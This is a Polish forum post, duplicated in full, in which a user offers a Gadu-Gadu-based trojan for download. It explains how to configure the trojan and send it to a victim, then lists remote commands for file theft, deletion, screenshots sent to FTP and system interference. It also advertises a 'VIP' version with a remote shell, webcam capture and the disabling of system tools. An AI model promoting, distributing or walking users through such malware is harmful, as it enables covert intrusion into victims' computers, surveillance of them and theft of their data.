spiterbot
Użytkownik
- Dołączył
- Listopad 1, 2007
- Posty
- 143
witam,mam do zaprezentowania trojana opartego na protokole gg
wykrywalność
download
konfiruracja nie powinna sprawić problemów:
wystarczy założyć nowy numer gg
dodać go do listy kontaktów
wpisać ten numer i hasło do niego w generatorze(dane do ftp mozna zmienić pozniej)
wysłać wygenerowany plik ofierze
gdy numer będzie dostępny z opisem "Online" mozna wydawać następujące komendy:
cd [folder] - zmienia/wyświetla aktualny katalog
ls - wyświetla pliki w aktualnym katalogu
cp [plik zrodlowy] [docelowy] - kopiuje plik
rm [plik] - usuwa plik
screen [nazwa pliku] - robi zrzut ekranu(.jpg 80- 130 kb) i wysyła go na ftp
set zmienna=wartosc - zmienia ustawienia trojana dostępne zmienne:
gg_ne,gg_pass,ftp_srv,ftp_login,ftp_pass,"set -i" wyświetla aktualną konfiguracje,zmiany wchodzą w życie po "zrestartowaniu trojana"
restart - "restartuje" trojana
upload [plik(i)] - wrzuca plik na ftp(może wystąpić znak '*')
wnd - lista okienek w systemie
msg [tresc komunikatu] [tytul] - wyświetla okienko komunikatu
opencd - otwiera cd-rom
closecd - zamyka
hidetray - ukrywa pasek zadań
showtray - pokazuje
swap - zamienia przyciski myszy
exit - wyłącza trojana(do następnego uruchomienia komputera)
uninstall - usuwa trojana z komputera ofiary
trojan jest case-sensitive tzn. rozpoznaje komende "opencd" ale "OPENCD" już nie
jeśli w jakimś parametrze występuje spacja należy uzyć znaku "
np. msg "treść komunikatu" zamiast msg treść komunikatu
możliwości wersji VIP:
-wszystko co wyżej
-dostęp do cmd(ze zwrotem oczywiście)
-ściąganie plików na komputer ofiary
-zrzut obrazu z kamery
-zablokuj/odblokuj/ukryj/pokaż/zamknij okienko
-wyłączanie włączanie monitora, dostępu do rejestru/panelu sterowania/menadzera zadań/wybranych dysków
-wyszukiwanie plików
-zmiana tapety
-blokada myszki,zawieszanie kompa itp.
pozdro
wykrywalność
download
konfiruracja nie powinna sprawić problemów:
wystarczy założyć nowy numer gg
dodać go do listy kontaktów
wpisać ten numer i hasło do niego w generatorze(dane do ftp mozna zmienić pozniej)
wysłać wygenerowany plik ofierze
gdy numer będzie dostępny z opisem "Online" mozna wydawać następujące komendy:
cd [folder] - zmienia/wyświetla aktualny katalog
ls - wyświetla pliki w aktualnym katalogu
cp [plik zrodlowy] [docelowy] - kopiuje plik
rm [plik] - usuwa plik
screen [nazwa pliku] - robi zrzut ekranu(.jpg 80- 130 kb) i wysyła go na ftp
set zmienna=wartosc - zmienia ustawienia trojana dostępne zmienne:
gg_ne,gg_pass,ftp_srv,ftp_login,ftp_pass,"set -i" wyświetla aktualną konfiguracje,zmiany wchodzą w życie po "zrestartowaniu trojana"
restart - "restartuje" trojana
upload [plik(i)] - wrzuca plik na ftp(może wystąpić znak '*')
wnd - lista okienek w systemie
msg [tresc komunikatu] [tytul] - wyświetla okienko komunikatu
opencd - otwiera cd-rom
closecd - zamyka
hidetray - ukrywa pasek zadań
showtray - pokazuje
swap - zamienia przyciski myszy
exit - wyłącza trojana(do następnego uruchomienia komputera)
uninstall - usuwa trojana z komputera ofiary
trojan jest case-sensitive tzn. rozpoznaje komende "opencd" ale "OPENCD" już nie
jeśli w jakimś parametrze występuje spacja należy uzyć znaku "
np. msg "treść komunikatu" zamiast msg treść komunikatu
możliwości wersji VIP:
-wszystko co wyżej
-dostęp do cmd(ze zwrotem oczywiście)
-ściąganie plików na komputer ofiary
-zrzut obrazu z kamery
-zablokuj/odblokuj/ukryj/pokaż/zamknij okienko
-wyłączanie włączanie monitora, dostępu do rejestru/panelu sterowania/menadzera zadań/wybranych dysków
-wyszukiwanie plików
-zmiana tapety
-blokada myszki,zawieszanie kompa itp.
pozdro